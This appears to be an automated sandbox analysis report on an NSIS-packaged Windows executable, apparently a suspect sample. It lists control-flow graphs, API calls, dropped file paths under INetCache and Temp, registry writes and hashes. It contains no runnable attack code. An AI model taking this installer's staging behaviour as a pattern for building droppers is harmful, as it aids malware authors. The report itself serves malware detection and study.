                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                              • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                              • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282139019-0
                                                                                                              • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                              • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                              • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                              • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 380 40395e-403986 call 405f22 377->380 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 380->378 386 403988-40398c 380->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 424 403af8-403b08 GetClassInfoW RegisterClassW 418->424 425 403b0e-403b31 DialogBoxParamW call 40140b 418->425 419->418 420->393 421->402 426 403b57-403b5e call 40140b 421->426 424->425 430 403b36-403b3f call 4037ee 425->430 426->402 430->396
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 004038B8
                                                                                                                • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                              • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 0040391F
                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: "C:\Users\user\Desktop\FILHKLtCw0.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 606308-1859281550
                                                                                                              • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                              • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                              • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                              • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 460 402eab-402eb2 451->460 461 402fcd-402fd5 call 402d8a 451->461 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 484 402f92-402f98 455->484 456->453 482 402fd7-402fe8 456->482 462 402eb4-402ec8 call 405be5 460->462 463 402f2e-402f32 460->463 461->453 471 402f3c-402f42 462->471 480 402eca-402ed1 462->480 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 473 402f51-402f5b 471->473 474 402f44-402f4e call 4064dc 471->474 473->448 481 402f61 473->481 474->473 480->471 486 402ed3-402eda 480->486 481->445 487 402ff0-402ff5 482->487 488 402fea 482->488 484->453 484->456 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 493 402eee-402f0e 491->493 496 40301e 492->496 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->471 499 402f2a-402f2c 497->499 498->481 498->497 499->471
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FILHKLtCw0.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FILHKLtCw0.exe,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                              • String ID: "C:\Users\user\Desktop\FILHKLtCw0.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FILHKLtCw0.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 4283519449-4222525829
                                                                                                              • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                              • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                              • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                              • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 637 4017ad-4017ae call 4062e9 631->637 632->637 641 4017b3-4017b7 637->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 650->643 651->650 656 401867-401871 call 4051b4 653->656 657 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->657 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 656->666 657->641 689 40185c-40185d 657->689 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 676 402a57-402a5b 670->676 674 4018d9-4018dc 672->674 675 402a4c-402a4f 672->675 678 4018f1-4018f4 call 406077 674->678 679 4018de-4018ef call 406077 lstrcatW 674->679 675->670 683 4018f9-40228d call 40579a 678->683 679->683 683->676 689->666 691 40185f-401860 689->691 691->656
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin,?,?,00000031), ref: 004017A8
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin,?,?,00000031), ref: 004017CD
                                                                                                                • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin$C:\Users\user\AppData\Local\Temp\nsn582.tmp$C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll$Call
                                                                                                              • API String ID: 1941528284-2331084858
                                                                                                              • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                              • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                              • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                              • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 725 403235 713->725 718 4031e7-4031ed 714->718 715->716 716->702 724 4030fb-403104 716->724 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 730 403201-40320d call 405cdc 721->730 722->721 727 40310a-40312a call 40654a 724->727 725->710 734 403130-403143 GetTickCount 727->734 735 4031d3-4031d5 727->735 736 4031d7-4031d9 730->736 737 40320f-403219 730->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->718 740 40321b 737->740 741 403155-40318b MulDiv wsprintfW call 4051b4 738->741 742 40314f-403153 738->742 743 403192-403196 739->743 744 4031c7-4031cb 739->744 740->710 741->739 742->739 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 753 4031a4-4031a6 747->753 749 4031bb-4031bf 748->749 749->727 752 4031c5 749->752 752->710 753->736 754 4031a8-4031ab 753->754 754->749
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$wsprintf
                                                                                                              • String ID: jA$ jA$... %d%%
                                                                                                              • API String ID: 551687249-2167919867
                                                                                                              • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                              • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                              • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                              • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 760 402609 758->760 761 40260c-40260f 758->761 762 402a55-402a5b 759->762 760->761 763 402773-40277b 761->763 764 402615-402624 call 405fb5 761->764 763->759 764->763 768 40262a 764->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 772 4026e4-4026f4 call 405cad 770->772 773 4026ce-4026d1 770->773 771->763 774 40265b-402660 771->774 772->763 784 4026f6 772->784 773->772 775 4026d3-4026de call 405d0b 773->775 774->763 777 402666-402674 774->777 775->763 775->772 780 40267a-40268c MultiByteToWideChar 777->780 781 40272f-40273b call 405f9c 777->781 780->784 785 40268e-402691 780->785 781->762 787 4026f9-4026fc 784->787 788 402693-40269e 785->788 787->781 789 4026fe-402703 787->789 788->787 790 4026a0-4026c5 SetFilePointer MultiByteToWideChar 788->790 792 402740-402744 789->792 793 402705-40270a 789->793 790->788 791 4026c7 790->791 791->784 794 402761-40276d SetFilePointer 792->794 795 402746-40274a 792->795 793->792 796 40270c-40271f 793->796 794->763 797 402752-40275f 795->797 798 40274c-402750 795->798 796->763 799 402721-402727 796->799 797->763 798->794 798->797 799->769 800 40272d 799->800 800->763
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                              • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                              • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                              • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 811 4023d1-4023de call 402bbf lstrlenW 808->811 812 4023e2-4023e5 808->812 811->812 813 4023f5-4023f8 812->813 814 4023e7-4023f4 call 402ba2 812->814 819 402409-40241d RegSetValueExW 813->819 820 4023fa-402404 call 403027 813->820 814->813 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn582.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn582.tmp
                                                                                                              • API String ID: 1356686001-4118235436
                                                                                                              • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                              • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                              • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                              • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                              Control-flow Graph

                                                                                                              • Executed
